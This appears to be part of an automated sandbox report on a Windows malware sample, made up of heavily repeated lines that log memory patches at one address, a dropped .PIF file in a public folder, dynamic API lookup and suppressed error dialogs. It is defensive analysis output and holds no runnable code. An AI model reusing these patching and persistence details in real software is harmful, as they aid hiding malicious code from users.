Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 6936 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: PID: 4396 base: 5015CC value: E9 7F 5B F0 FF

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_02867D08 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02867D08

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
